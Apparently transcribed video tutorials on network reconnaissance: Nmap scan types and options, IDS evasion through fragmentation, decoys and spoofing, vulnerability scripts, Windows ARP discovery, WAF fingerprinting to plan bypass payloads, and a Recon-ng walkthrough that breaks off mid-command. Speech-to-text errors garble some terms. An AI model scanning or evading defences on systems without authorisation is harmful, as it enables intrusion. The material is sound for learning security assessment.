Additionally, Hi and welcome back to another episode on How to Hack. So today we'll be discussing about Nmap, a network mapping tool that can help us discover services, ports, devices inside a network, in or out of a network, and be able to find out more information about them. And we'll be going through some of the options and parameters that could be part of Nmap. And also we'll look at scripting capabilities and ultimately how do we use it in a penetration test, how do we do it during a security assessment using Nmap. So before we go into Nmap, we want to learn about what is banner grabbing. So banner grabbing is actually probing the service, probing the device, looking for specific information on the port number. So in this case, if you see on the right side, we are trying to probe a specific target on port 21, and it says that file transfer protocol is open. So this gives us some details about the port, about the kind of service that's available. So you can think of this as an analogy of going into a house. So before you go into a house, you want to see what kind of doors they have, what kind of services are open for it. And of course, when you knock onto the door, you can see that perhaps this is a restaurant. This place is a place that provides services for laundry. So again, you're trying to find out more information by probing into the house, looking into the house, knocking onto the door, finding out more information. So likewise, on the right again, we can see we are probing on port 80. So port 80, Hypertext Transfer Protocol, we see that it's open, so the port is open once again. So this is a way where system administrators actually try to take inventory of the kind of services and systems that are available inside a network. All the houses in that lane, what do they offer? So again, this is a way of us using banner grabbing as a start. And of course, this also brings us to another fundamental about network, about services. So on the left side, we can see the kind of messages we have. So we have sing, we have acknowledge, we have sing, acknowledge, as well as finish. So the description of sing is trying to establish a connection with another device, from your browser to another computer, from a computer to another computer. And of course, acknowledgement comes in effect when another device replies to you, acknowledging the service. And ultimately, you sync and acknowledge, and this gives us a chance to actually start the connection. And ultimately, if you want to terminate the connection, you send a finish message into the other device, and that will close the connection immediately. So over here, this is the three-way handshake. So the three handshake, so you see on the left side, we have computer A trying to talk to computer B. So it would do a send of a sing message, and the computer B will reply with a sing acknowledge, and an acknowledge will be responded from computer A to computer B. So this completes the three-way handshake, and it establishes a connection between the two computers to start exchanging messages. So this is an important concept because this helps us visualize what happens behind the scene of Nmap. How is Nmap probing and telling you how a port's open and what to do in order to find out if they're open. So some key terms. So on the right side, we got transmission control protocol. So this is connection oriented. So this is a place where the three-way handshake occurs, and we are able to actually look at the stable connection between two computers. And we've used the datagram protocol, which is connectionless. So it is a way of fire and forget of packets. And this actually just sends a lot of data to the other computer without checking whether the connection is stable. And ultimately, we got what we call socket. So socket is IP address followed by the port number. So this allows the opening of a particular service from a machine so that you can actually connect into that particular service. So what is Nmap? So Nmap is a network mapping tool. It's a network exploration tool. Helps us find out a lot of information about the network, and it's a really, really useful tool. Not just the network, but also the devices within the network by scanning their ports, looking out for what kind of protocols they're running on. So that's a great way of trying to find out what kind of services is available on the network. So there's a number of scan types. So of course, on the right, we can see 6 major scan types. So the first one is SWIP, where we actually send ICMP pings, which are the way for us to ping devices and see whether those devices are alive, whether they're reachable, are we able to reach them. And the second one is trace. So trace is using trace route to actually find out how the packets are being sent across the network into ultimately the computer that we want to reach on the destination. And then we have port scanning. So port scanning, check for open TCP or UDP ports inside a computing device. And a computing device could be an email server, a database server, a web server, could be a generic general server. So again, we're trying to find out all the services available. So on the bottom, we got fingerprinting. So fingerprinting determines the operating system type. Is it a Linux? What version of Linux is it running on? If it's a Windows server, what kind of version of servers is it running on? Is it a notebook? Is it a Android device? So again, we're trying to find out what operating system is that particular device through Mmap as well. And we have version scanning. So version scanning actually helps us find out all the services and protocols that are used inside a system. And of course, we will have demonstration of how we could find out all of these scan types later on. And on the most right bottom, we can see vulnerability scanning. So we can also use Mmap to actually do vulnerability scanning. So if you look up on the previous tutorial, we were using Metasploit to actually scan for vulnerabilities. And of course, in this case, we can use Mmap as well to do those vulnerability scanning to find out if those services are vulnerable by checking against common vulnerability exposure database. So again, these are the 6 key functions that we can use for scan types in Nmap. So of course, after you perform the scan, there will be the port states that will actually be provided to you after you completed the scan. So on the left, we can see on this table, we got open, close, filtered, unfiltered, open filtered, and close filtered. So if the port is open, we will be able to see that the application is accepting TCP connection. So if you think about how we were doing the three-way handshake, so whenever we send a sync, we'll get a sync acknowledged back, telling us that the port is open up for us to test on. And for the second role, we can actually see it's closed. That means when we send a sync message into that particular service, we may not get a response coming back, or whenever we are sending or using auto scanning techniques, we're not able to see if the port is open inside the device. And we also have filtered. So again, filtered could be because there is a firewall in between it. So if we're scanning a web application server, there could be a web application firewall trying to restrict the kind of scanning that we could do inside the firewall or inside a web application server. So again, the firewall is standing in front of it, trying to protect it. And if we're scanning a database, so again, a database could also have a firewall. And again, it could be a network base, could be a host base. So again, it's trying to filter out many of these potential scanning techniques that could actually otherwise show them the version of the database, the version of the web application service, or the services that are available as part of the server. And of course, we also have unfiltered. So the port is accessible. However, the scanning result is not able to determine whether it is open or closed. So again, this is another way where we may have to start looking at using some other tools to help us finally aggregate the results from all the scanning tools and from all these scanning techniques that could tell us what state is that particular service inside the server. And we have open filtered. So over here, the Mmap places port in this state is not able to determine whether the port is open or filtered. So of course, this happens when you are scanning the open port that gives no response. So again, we may have to start using different kind of scan techniques to ultimately get back a positive result telling us whether that particular service is open or not. And finally, we got a close filtered. So this is when Mmap is not able to determine whether the port is filtered or not. So again, we can also look at some of the other scanning techniques to help us further progress our penetration testing in terms of information gathering. So the first thing we do is to constantly look up the manual page or the documentation of Nmap. So this is the place that we'll be using a lot, especially when we try to understand some of the searching parameters or options as part of Nmap. So this is the #1 place that we'll go into, and you could be spending hours every day trying to read up, understand the options, and trying to test out all the different options on your servers. So this is #1 place that we'll be referencing a lot of our scanning from. So when you look at Mmap through the manual page, we can see a number of scan options. So the first one that you see is the target specification. So this is the part where we are trying to tell Mmap if we are scanning a particular host, the host name, a range of IP addresses, what type of networks, or we can include files to actually look up the whole list of IP addresses that we want to scan against. So over here, this is a result of scanning using Mmap. So here we can also see in terms of host discovery. So we are using on the right side, if you see from the screenshot, -s n. And of course, this is where we indicate ping scan. So this is a disabling of port scan. We just want to quickly find out if the hosts are up. So again, you could also use another tool called NetDiscover. And again, a lot of this could be using just the ICMP ping to actually reach to the host and find out if the host is alive or not. So this is a very quick way to find out the IT devices within a particular network. So on the left side, we can see the full list of the options that we can indicate. So again, we have the skipping of host discovery. We have a list of targets that we can indicate to Nmap. And of course, we also can see ICMP echo. So we can change some of this discovery request probes. And of course, we can also disable the DNS resolution. So if you saw from one of the earlier lectures, we were looking at domain name servers resolution, where we have a list of IP addresses and a list of domain names. So again, those could take time because you need to probe the DNS server to get that list of the IP addresses and the associated list of domain names. So again, we can disable that so that can speed up the whole process of scanning. And of course, the last item is on trace route. So trace route allow us to see how the packet is transiting inside the network from one device to another. So another great way for us to find out in terms of host discovery. So of course, moving forward, we have the scan techniques that we can indicate as part of Nmap. So if you saw earlier, you can see from the second bullet point, we have a dash small s with a big S, and we got small s and big T and so on. So we got TCP scan or TCP sync. So if you saw earlier from the three-way handshake, so we only be using the TCP sync when we're using the Nmap technique, or if you want to use the connect scan, the acknowledge, the window, the Maimon scan. So again, all these are the options that you have. And of course, on the third bullet point, you can see a small dash S followed by capital U. So that's a UDP scan. So user datagram protocol scan. So we're only scanning for services that could have UDP up and running on those machines. So of course, we also have many other scanning options. So again, we want to use all these different kind of scanning techniques extensively, get familiar with it, try out all of the options as you're doing the tutorial so that you understand how the scanning techniques work, how it will affect the response coming back from the servers, from the devices in the network. And you can also use these ways to find out if there is a network intrusion detection system or prevention system by throwing out all this different combination of packets into the network and seeing the response from it. So here we have a port specification and scan order. So over here on the left side, we can see a screenshot indicating -P 1 to 65535. So we're scanning from port 1 all the way to 65535, and we're targeting a particular IP address. So of course, on the right side, we can see what kind of modes we can go into. So we got a -F on fast mode. So we will scan fewer ports than the default scan. And of course, we got -R. So again, you can actually read through into the manual page what constitute fewer ports. What are the key ports that will be scanned as a result of using that option? So all these are key things that you want to read up in the manual page so that you can understand further about how you can use Nmap. So we can also look at the top ports, so commonly used ports. So you can think about the commonly used services inside a server. So chances are FTP, HTTP, SSH, SMTP, and so on. So there's a huge list of those commonly used ports that we can scan only to find out if those critical services are running inside the particular server or machine. Moving forward, we also have the service/version detection on the scan options. So in this case, we're using a -s followed by a capital V. So this would actually describe all the services in details if it could get against the signature, the list of signature when we are probing or doing banner grabbing into all of those services. So this is one of the ways Nmap is working, trying to find out what are the specific version of services inside the computer and machine. So if you actually go back up from all the service results, so over here, this is going back up a slide to slide 13. We can see all the services, but we are not sure what is behind the service. So what kind of secure shell version is it running on? What kind of SMTP server is it running on? The mail server that it's running on? So all these are key questions that can only be answered as part of -s capital V. So this is service version detection. And of course, we also have the version intensity. How intense are we going to try to find out the version number inside each of those services? And of course, on the right side, we can also increase the verbosity or show the detailed version scan activity, so we can see exactly what kind of information is being sent from Nmap all the way into the particular target machine, and we can find out more from there. So we also have a script scan. So script scan is going to be expanded later on during our tutorial, as well as the later part of the lecture. So of course, we have multiple use of scripts. So scripts are a way for us to actually make Nmap a little more flexible and versatile. So there are a lot of scripts being written by developers out in the market. So what it does, there could be many different kinds of scanning. So it could be scanning a particular service. It could be trying to find out a particular HTTP port and trying to find out what kind of service is it running on. So as well as other many capabilities and functions. And we can also put in arguments if that particular script takes in arguments to check whether we want to further extend the features and functions of controlling the modules as part of the scripting engine, or controlling the script as we're doing the scan result from it. So here we got operating system detection as part of the scan option. So if you see on the left side, we can actually see that the operating system details, Linux 2.6.9 to -2.6.33. So again, we can enable OS detection and we can find out what is the operating system type. So if you go back to the previous tutorial, on Metasploit tutorial, we could actually see that we need specifics, especially on operating system type, as well as the software version. And then we'll be able to find out if we can actually do the lookup on the common vulnerability exposure and be able to find an exploit for it and be able to hack into the system. So again, OS detection is going to be key also in terms of finding out more details about a server, about a particular IT device that we're scanning into. And of course, on the right side, we can see the options. Now, sometimes you may not be able to actually find out the operating system type. So that is when you may be using the --OS scan -guess. So again, we are trying to guess the operating system more aggressively from the use of that function. So there are also timing and performance control that you can actually input into. So a lot of times if you're scanning in a production network or environment, chances are they have security monitoring platforms like network intrusion prevention systems, like a SIEM. So again, all this could be running in the system, running in the background, as well as host-based detection and network-based detection, all working hand in hand, trying to find out when an attack is incoming, someone is doing some aggressive scan, someone is doing stealthy scans, and so on. So this is a part where you want to control how quickly you're scanning the network, and you can actually indicate the amount of time taken to actually scan a service, or the particular time taken to scan all the network based on the parallel host scan group sizes and the amount of parallelism that you are scanning on the system. So again, great way to control how you want to scan a network if you know they're running some kind of products or technology that is used on the defensive end. So at the same time, like we mentioned earlier, there could be firewall intrusion detection systems. So we're constantly trying to evade them while getting all this information about the server, about the devices. So over here on the right side, we can actually fragment the packets. So that's one quick way, because whenever the packets go through the firewall, they would actually do a stateful filtering. They will check the particular packet, so you can break it down, fragment it into smaller and smaller fragments, making it more and more challenging for the firewalls to actually be able to find out what kind of information is coming in on. And you got a -D, so that's a decoy scan. So again, we can push out decoys in the network, trying to fix scans on it. So that could be another way. And we are also able to spoof the IP address of where you're scanning from. So again, this is the spoofing of the source IP address. So you could actually augment and change those results coming in again. And of course, we can change different kind of interfaces. So if you've got different kind of network interface cards or different IP addresses, you can use this to actually change the network interface on it. And of course, we can also change the port number where we're coming to scan from, the source of the port scan. So again, all these options have to be set inward so that we can actually control the result in a response coming back from the system, trying to evade all this firewall intrusion detection system. So we also have the output and capability of outputting more information as part of the Nmap scan. So -V on the left, as you can see from the screenshot. So that is one way for us to open up more details about how the scan is going and what kind of scan result is it coming from. And of course, on the right side, we can see all the parameters. So there's a lot of different kind of output that we can put into the system. So one, we can have XML. So XML format would actually give us the rows and columns of the results coming out. And of course, we can increase the verbosity. In this case, we're using -V on that. And of course, you can look at decreasing the debugging level or -D on that to actually look for greater effect. So again, multiple ways for us to actually look at the scan results, what kind of packets is being sent, what kind of parameters are they using as part of the scanning. And of course, we can look at some error also if we're using from the scan and if we could not detect a particular port or service and we're very sure that it's running. So again, we want to increase the verbosity on those checkings. So of course, we also got the miscellaneous scan options. So if you are running on an IPv6 network, so you could use -6 on that. And of course, we could use -A to enable a number of options like OS detection, version detection. So multiple things could be enabled at one shot. And of course, we also have data file location, and we got the use of raw Ethernet frames or IP packets. So if you want to craft those, we can actually go ahead and do that. So again, -H, very, very important way for us to actually print a summary page. So again, we want to constantly look at the manual page, especially when we're using it for the first time or the first few times, and we're confused about some of the options. So the manual page is going to be a great place for us to reference a lot of all these materials from. So Nmap Scripting Engine, NSE, is a great way for us to actually include scripts from Nmap to actually run more extensive features and functions that could be outside of what we saw earlier on the slides, understanding more about Nmap. So there's a lot of extensive functions that we can actually look into by deploying all these additional modules or scripts into Nmap, and we can run them extensively. So we got the major script categories on the left side. So we got authentication, broadcast, brute force, and many others. And of course, on the right side, if you have Kali Linux or if you have Nmap installed into your system, you just go into USR, share Nmap scripts, and we can actually do a listing of all the NSE, all the Nmap scripting, and we can actually see over here, we got checking on FTP, checking on HTTP, checking on MySQL, RDP, RSA, Soundbar, and so on. So great way for us to check if a particular service is vulnerable to a CVE, or check if we could exploit into the system, or check if we can do a brute force attack directly into the system. So again, great ways for us to explore further features that does not come along the default core of Nmap, but to expand upon it. So a great way to look at scripting on this. So here we're looking at a Nmap vulnerability scan. So we are using a -s followed by capital V followed by --script equal vulner. So again, --script equal. This is the part where you will include what kind of vulnerability scanner or what kind of script you'll be adding as part of the scan. And finally, with the IP address. So the function of this script actually help us associate what service you're running on for the particular device and what potential CVE, common vulnerability exposure database item or ID, it may be associated with, so that we can look it up. And if you think back about the previous tutorial on Metasploit, we could actually do a connection between the CVE numbers here and checking it back on Metasploit to see what kind of potential exploits are ready in Metasploit. If not, can we load it in? And after we load it in, are we able to run and execute the exploit against the system? So as we're doing the information gathering, active information gathering through Nmap, so this is one of the great ways to actually be able to find out what's going on and be able to plan our next step in the penetration testing. So 3 great references. So there are a lot of options in Nmap that you may not familiar with. So here are 3 great sites that you want to look into to help you understand more about all these options, different kind of scan results, scan techniques that you can combine as part of your information gathering, as part of using the scripts inside Nmap. So again, great reference point. And finally, the question on hacking with Nmap, is it possible? Yes, based on the scripting technology that comes with it. Can we do a login? Can we do a check on the system? Can we exploit into the system using Nmap? So again, we are able to explore in it, and we are going to see it also inside the tutorial right now. So on the left side, I have a virtual machine running, so I can enter ifconfig, and we can see the IP address of 192.168.1.85. So this is the target IP address. And of course, we also got Kali Linux running. So I can open up terminal and we can zoom in a little so it's easier for you to see. So of course, the first thing you can do is actually enter man Nmap. So this would actually boot up the manual page or the reference guide of Nmap. So we can tell it is an open source tool for network exploration and security auditing. So as we scroll down, we can see the different examples of a Nmap scan. We can see the different kind of option summary. So here we got target specification that we went through, host discovery, scan techniques, pod specification, service version detection, script scan, OS detection, timing and performance, firewall, IDS, evasion and spoofing, and so on. So again, all of these options are available and described very well here in the manual page. So anytime you don't remember what is the purpose of the option, you go back into the manual page and search it up. So moving forward, we can look at the scan result over here. So we actually did an nmap. So we can do nmap-sn followed by the IP address of 192.168.1.0/24. So what we are doing here is we are scanning the entire network for hosts or devices that are opened up. So when we hit enter on that, /24 is actually the subnet mask. So we are actually indicating the scanning across all of these devices. So we're scanning the full IP range of devices inside the last class. So here we got 192.168.1.0. So we're scanning all the IP devices on the last one. So here we can see whether the host is up and as well as the IP address of the host. So we are not doing any kind of port scanning inside those IP devices. So this speeds things up. So here we can see 256 IP addresses completed in 16.09 seconds. So moving forward, we also got a scan option on the pod specification and scan order. So here we can actually look at nmap and we can actually indicate nmap 192.168.1. For example, we are going after 85, and then we can indicate the port numbers that we want to scan into. So I can zoom in a little on the right side on the lecture slide that you saw earlier. So we actually use a -P 1-65535. So this was scanned across all the ports inside the IP address. So again, over here, we can see all the port responses and the services associated with the port number. So we got file transfer protocol, secure shell, telnet, SMTP, domain, and so on. So again, we're thinking about some of these options. What are the commonly used port in the server, and how could you actually identify them? Perhaps using another technique as well, other than nmap. So moving forward, we also got a -SV. So again, this is another way for us to actually find out more details about all the services inside the particular IP address. So when we hit nmap-sv followed by the IP address, all the domain name or the host name on it, we can hit enter on that. So this would give us more details about each of the service that is running inside the system, meaning that we can find out specifically what is the version number of each of this service, and we can actually do a lookup from CVE, for example, or from Metasploit, or from Searchsploit, and we can find out whether there are vulnerabilities inside each of these services. So here we can find out a lot of information regarding each of these services, and we can see the version details. And again, all this really help us accelerate the pace of finding potential exploit, looking for vulnerabilities inside the system. And the next one we can look at is, of course, the -O. So this would actually enable the OS detection in the system. So for example, going back here, all I gotta do is put a -O, hit enter on that, and it will scan the IP address. So it says require root privileges. So you can enter sudo, and it will ask you for your password. So you just key in your password for your user account. Hit enter on that, and it would actually scan, including on the end of the OS detail. So here we got the OS detail, Linux 2.6.9 to Linux 2.6.33. So again, this is another way for us to look at what kind of operating system it could be running on. So over here, we got the scan options. So here we got the -V. So -V is in terms of verbosity. So again, we can indicate all this information to actually find out more details about how nmap is faring across in the process, or in the process of scanning with a particular IP address. So again, if you do a -V, again, we could have different results. So all these are different ways for us to find out more details about the scanning, how the scanning was conducted, or if we can actually look at the debugging function as well, we can look up more information on this. So over here, we do a -D. So again, we can see connection refused, and we can look up more information as we scroll up. So maybe we can actually see for some of the connection accepted. So here we can see, so you remember from the slide, sync acknowledge. So again, we see a sync acknowledge saying that the port number is open, and we can find out more details from there. So here, likewise, we can actually go into the directory by cd, usr, share, followed by mmap, followed by scripts, and enter ls-l on that. So here we can see a lot of this .nse. So all these are the mmap scripting engine. So we can see a lot of different kind of scripts that we can use. And of course, it is not possible for us to go through the whole of this in today's tutorial. So you have to try them out as much as possible, get an operating system, run some services on it, and start doing your scan. So we got MySQL dump hashes, empty password. So again, all this could be part of the cyber attack chain. So if you think back about the cyber attack chain that you saw earlier on the lecture, was that we covered extensively in information gathering, exploit, delivery. So mmap would have some of these scripts that could actually go into the exploit phase, or even dumping hashes and so on. So again, all these are key capabilities that you must explore to find out how it could actually aid you in your penetration testing. So of course, the number one script that we'll look at is in terms of trying to find out what are the CVE combination of affiliation with each of these services. So over here, as we have did a screenshot, we can actually do a mmap-sv for service detection, followed by --script equal vulners. So this is vulnerabilities, and followed by the IP address 192.168.1.85. So you hit enter on that. And this would actually start scanning for all the services inside the IP address and trying to connect them back into the CVE details. So that's great because it do a two job for you. One is it scans for the services they're available, and two, it can actually allow you to find out what kind of information is available as part of the system. So again, great way for us to find out more details about the system in question, and we can actually check a lot of this information out from there. So of course, the great thing about it is that you can also look up what is inside the system. So for example, over here we can scroll up and we can see, for example, we got the use of SSH. So it says vulnerability 2010, 2017, 2016, 2008, and so on. And of course, you can actually do a cat on that. So the file is right here. So we got vulners.nse. So all you got to do is do a cat vulners.nse, and we can see how the script is written and how they're doing the checking. So again, a lot of things you can write it on your own and be able to create some of these steps in advance for you, just like how vulnerability scanner script is actually being used in this case. So you find out the service number, and two, you check it back on CVE details to see if you can find those vulnerabilities. So once again, I hope you've learned something valuable in today's lecture and tutorial. So if you have any questions, feel free to leave a comment below, and I'll try my best to answer any of your questions. So remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another episode on How to Hack. So today we'll be discussing on using Windows operating system to actually detect all the network devices within a environment. And there's a lot of commands that are out of box within a Windows operating system that you could actually use to actually find out all of these devices, whether they're printers, whether there's operating systems, their access points, network devices, and so on. You'll be able to look out for all these devices and then plan other kind of potential exploits, vulnerability scanning across all these IP addresses. So without further ado, let us get started on today's tutorial. So over here I have a Windows 10 running, and you can actually go into the start program and enter CMD. So CMD would stand for command prompt. And once you got command prompt running, all you got to do is actually go into properties. You can actually zoom in a little so it's easier for you to see. So actually use the font size of 32, and here we can see we are on the directory of C uses Yang. So the first thing that you can do is actually enter ipconfig. So whether you're connected into any kind of network, in this case we got a wireless LAN adapter called Wi-Fi Pineapple. and we got an IPv4 address of 192.168.1.10, and we got a subnet mask of 255.255.255.0. So what this means is that all the IP address coming from 192.168.1.1 all the way to 254 are all IP addresses within the subnetwork. So the first thing that you can do in terms of looking at this is what are the devices within the environment that you can scan for using Windows default commands. So the first thing you want to look at is to actually look at ARP. So when you enter ARP, which stands for Address Resolution Protocol, it would actually give you a table of all the commands and parameters that you can actually enter as part of ARP command. So what we can do is we can actually look at -A, which is the current ARP entries by interrogating the current protocol data. And because -G, -V displays ARP entries in verbose mode. And also we got -D and many other capabilities. So the first thing we can look at is ARP-A. So when we enter ARP-A, we can actually see all the interface information like the physical address, the static type. So here we can see 192.168.19.1.189.1, .1.10, and over here we can actually see IP address like .1.3, 254, 255, and so on. So a lot of other information that will list out all the IP addresses within the network environment. And of course, moving forward, there are also other capabilities that we can look at. So in terms of the looking of the network, we can also enter netview/all. So when you enter netview/all, this would actually list out all the connected devices within a net view. So this could take a while for the command to actually run through in the environment, in the network environment, before we get a listing coming back. So here we can see that we have a server name of //pc, and we see that the command has been completed successfully. So what we can do is we can actually open up VirtualBox, for example, and in VirtualBox we can actually open up a couple more computers. So this would actually give us a better understanding or idea about what's going on in the environment. And when we do all this kind of looking up, like the address resolution protocol, or using netview/all, we can see new machines coming into the environment. So in this case, when I go to machine settings and when I go into network, I can see that we're using bridge adapter. So this would actually open up a new IP address within the environment. So the first thing we can do is we can enter the password into this new Windows computer, which is connected into the network. So once we're in, we can actually see whether we are connected into the network. So here we can see there is an internet access. And once we get that, we can actually go back into command prompt of the host PC, and we can actually, again, enter ARP-A. So if the ARP entry has been placed in, so we can actually go into CMD, and we can actually enter ipconfig as well. So we can see that we have the IP address of 192.168.1.13. And over here, we can see we have a new entry of IP address 192.168.1.13. And likewise, if we enter netview/all, we are going to see an additional computer coming up. And here we can see we have //desktop. So again, wherever you're connected to, we'll be able to list out all the computers within the network using some of these commands coming from Windows operating system. So there you've seen it, how quickly we could actually scan for all those devices using address resolution protocol that is actually part and inbuilt inside a Windows operating system. And two, you could also use the network NetView and be able to scan out for all those devices very quickly. And in no time, you'll be able to identify all these operating systems, whether they're alive, whether they're offline, and you can actually keep a repository of all those devices. So I hope you found the video valuable today, and if you have any questions, feel free to leave a comment below, and I'll try my best to answer any of those questions. So remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much for watching. Hey guys, welcome back to another episode on How to Defend. So today we'll be learning about how to uncover devices inside your home Wi-Fi network. Are you troubled by, for example, a slow network where you have a really hard time trying to surf the internet, and you're concerned whether a hacker is inside your network and whether your neighbor is perhaps tapping into your network, watching Netflix and streaming videos on YouTube. So over here, okay, let us go ahead and boot up Kali Linux, and I'll teach you a couple of tricks on how we can uncover all these devices inside your home network. So once we have Kali Linux running, all we got to do is log in. Okay, so go ahead and log into Kali Linux. And once we're into Kali Linux, okay, we can actually look at using the tool Nmap to help us uncover all these devices inside your network. So first of all, go ahead and enter IP space ADDR, and it will show us, okay, under ETH0, the interface ETH0, we can look at the IP address of the existing Kali Linux machine, and we have over here under iNet 192.168.0.106 followed by /24. So /24 means and stands for the subnet mask. So what it does is that when we do our scan, we'll be specifying 192.168.0, and it will scan, all right, the range of the /24, which is just the last segment over here, all the way, okay, from 0 all the way to 255, to find out which IP address is alive, which host is alive, and we can look up further into the services of each of these devices to flag out what type of devices they are. Okay, so go ahead and enter Nmap, followed by 192.168.0.0/24, and hit enter on that. And this would begin the Nmap scan. Okay, so while it is doing the Nmap scan, I want to introduce to you another tool that you can use to uncover devices inside your network. And this is called the ARP scan, which stands for Address Resolution Protocol. So Address Resolution Protocol works behind the scene, okay, tagging every device from the MAC address, Media Access Control address, to their IP address. Okay, so those are the protocols that are in use inside the network layer. Okay, so go ahead and enter sudo arp-scan. Okay, and what we need to do now is to actually specify the interface. So we saw earlier the interface is ETH0. So sometimes your interface could be WLAN 0, it could be some other interfaces. Okay, so go ahead and enter -- interface equal ETH0, and then followed by -- localnet. Okay, so once you do so, go ahead and hit enter on that, enter your super user password, hit enter, and it will begin uncovering all these different devices using Address Resolution Protocol. So over here, we can see out of 256 hosts, we have the number of IP addresses. Okay, so we have 192.168.0.1, and we have the Media Access Control address. Okay, then we have Samsung Electronics, so this is likely a Samsung device. We have an Intel Corporation device, so this is my home computer that is actually running this demo now. We have D-Link Corporation. Okay, so this is a network attached storage that I have running in my home. We got a couple of Apple devices. Okay, so I got an iPad, I got an iPhone inside the house that's running inside the home network, and then we have a couple of other IP addresses that are actually discovered over here. Okay, so locally administered. And if I go into the earlier scan that we do with Nmap, I can scroll all the way up again. Okay, so we can look at the initialization of the Nmap 192.168.0.0/24, and we can see over here we have 192.168.0.1, and we can look at all the services they're running. And in this case, for this particular IP address, we actually have HTTP. Okay, meaning that there is a web browser running. Okay, so you can, a web application system running, so you can actually access it from a web browser. So you can just simply copy the IP address, copy the selection, go to the top left corner, click on the web browser, and you can just paste the IP address, hit enter, and this will bring you to the administrative login page. All right, depending on what device you're running on and what kind of web browser technology they're running on, is it an application server, and so on. Okay, moving on. Okay, we have 192.168.0.106. So this is host is up, but of course the ports are not open, so likely an endpoint device 192.168.0.138. So again, likely another end user device. And then we have 172. Okay, that also has a web browser. It also has a web application system. It also has a secure HTTPS running. Okay, and then we have 174. Okay, and then we have 181, and we have 194. So we can see all this different information about all these different devices inside the home network. And then we can do further testing. Okay, to find out firstly if they are your device, are those devices already been compromised, what kind of services do they have running there inside those devices? Is there a backdoor? Is there some kind of service that shouldn't be running, but it's connected somewhere out onto the internet? So by using these two tools, right, Nmap, ARP-scan, it can help us uncover all these devices inside your home network. So once again, I hope you enjoyed the tutorial today. And if you like what you have just watched, remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another episode on How to Hack. So today we'll be discussing about the use and detection of web application firewall that are seated in front of web application servers. So whenever you're surfing the internet, there's always a web application server that's running and it will serve the content to your client browser. So what happened is that a lot of the web application servers are protected on the front right in between with a web application firewall. So the web application firewall will filter out, sanitize the first input before it is being loaded into the web application server. And from the web application server, it could be loaded into a database. So without further ado, let us get started on today's tutorial. So on the left side of the screen, I have Linux running, and I can open up a terminal here. And of course, we can zoom in so it's easier for you to see. So of course, the first thing you want to look at is on the right side. So it's all about WAF detection on HTTP. So of course, there's a lot of web servers out there in the internet or in the intranet which are running web application firewall to actually first look at what are the potential payload coming in and to be able to filter them away, get rid of those malicious payloads, sanitize inputs, and so on. So it's a really powerful way to protect web servers. And what we want to do is want to be able to detect those web application firewall so that later on you can think about how you want to put in your payloads, what are the ways that you can circumvent some of the security mechanisms, and so on. So of course, what we can do is we can actually look at Nmap, and Nmap has a key capability on HTTP WAF detect. So as you scroll down and you read through the script, and what it does is that it's able to actually help you find out what kind of WAF it's using and how you can detect it. So as we scroll down, we can actually look at some of the sample usage on the example. So here we can zoom in so it's easier for you to see. So of course, port 80, and then we have the detection and then the host name and so on. So go ahead and enter Nmap, and of course -p80 for port 80, followed by -- script, HTTP, WAF detect, and we are going to scan my website to see what kind of web application firewall I'm using, if I'm using any, and we'll be able to check what kind of information we have on the WAF. So go ahead and hit that, and we'll start Nmap, and we'll scan the server and look out for potential WAF. So here, immediately we get a response coming back. So we have a WAF detect. So here is confirmation that there is a WAF running and there was a payload, a simple payload, to check what kind of response we get from its system. So here we can actually see the script output very, very quickly from here. And of course, we have also some arguments that we can use, like HTTP WAF detect, aggro, and so on. So of course, moving forward, we'll look at the other script, which is a fingerprinting of the web application firewall. So here we have HTTP-WAF-fingerprint. So it tries to detect the presence and at the same time trying to find out what kind of WAF it is actually running on. So of course, scrolling down, we can look at the example usage. So again, Nmap -- script. So we can go ahead and key it in your Linux or in your Nmap command, equal HTTP WAF fingerprint, followed by www.loyliangyang.com. Hit enter on that, and we'll get a response of the fingerprint of what kind of web application firewall is running in front of the web server, so that we know further what are the key capabilities this web application firewall has and what kind of payload we can actually structure and build, so that when we send it directly into the server, we know that we have to bypass it. So from here, we can actually have the detected web application firewall, and it is running on a Cloudflare. So this helps us detect the kind of web application firewall that's running in front of the web server. So there is in it how quickly we could actually detect the web application firewall existence right on a domain name, right on a website server. And from there, we can actually do further investigation to find out specifically what kind of web application firewall is being utilized to protect the web server. And from there, you'll be able to craft out and build specific payloads that could potentially circumvent some of the security mechanisms or measures that are by default used in specific web application firewall. So I hope you have learned something valuable in today's tutorial. And if you have any questions, feel free to leave a comment below and I'll try my best to answer any of those questions. And remember to like, share, and subscribe to the channel so that you can become abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another episode on how to hack. So today we're discussing about the use of ReconNG as a tool to help us get credential information, get user information, subdomains, and crawling through some of the search engines to help us find out more details, especially in terms of the reconnaissance stage of our cyber attack chain. And once you have gathered all this information, it can speed up the whole process of finding out more details about the target enterprise or the target entity or even the target individual. And having all these details in place really help you understand what kind of exploit, what kind of vulnerabilities are available so that you can gain access directly into the system. So without further ado, let us get started on today's tutorial. So right now we're loading into Kali Linux, and the first thing you can do is open in terminal. And once we're in, we can zoom in a little so it's easier for you to see. And all you got to do is enter recon-ng, and this will bring you straight into the ReconNG administrative page or an interactive shell. And directly from here, the first command that you can use is actually to enter help. So all you got to do is actually click on help, enter help, and you'll be able to see all the commands that you can actually use directly within the interactive shell. So the two key commands that you'll be using is marketplace as well as modules. And all you got to do is enter marketplace. And it will tell you all the parameters that are available for you to key into. So when I do a marketplace search and I hit enter on that, I can see all the modules available for us to use. So over here we can see this broken down into different domains, and of course the very first one is discovery, exploitation, as well as import and reconnaissance. So reconnaissance is going to be a major bulk of the amount of things that you'll be doing directly with ReconNG. So of course there's a few things that we can look at, and one of it for us of course is to install HackerTarget. So this is actually one of the key components or modules that actually comes alongside some of the previous versions of Recon-ng. So what we got to do is actually look up for HackerTarget, and once we have this information, all you got to do is copy the path, and all you got to do is do modules install followed by pasting the path, and once you hit enter on that, you'll be able to install the module. So all we got to do is go back into marketplace and do a install. Marketplace install followed by the module name, and once you have that, you can enter modules, and you can enter modules followed by search, and you can see all the modules that you have running within your ReconNG. So what we're going to do is we're going to go and use the module, and we can do a modules load followed by recon domains-host/HackerTarget. Hit on that, enter info, and you can see what are the parameters and the options available for you to key in directly into this module. So all you got to do is enter options and followed by set source, and we're going to enter loyliangyang.com. And once you set that, all you got to do is enter run, 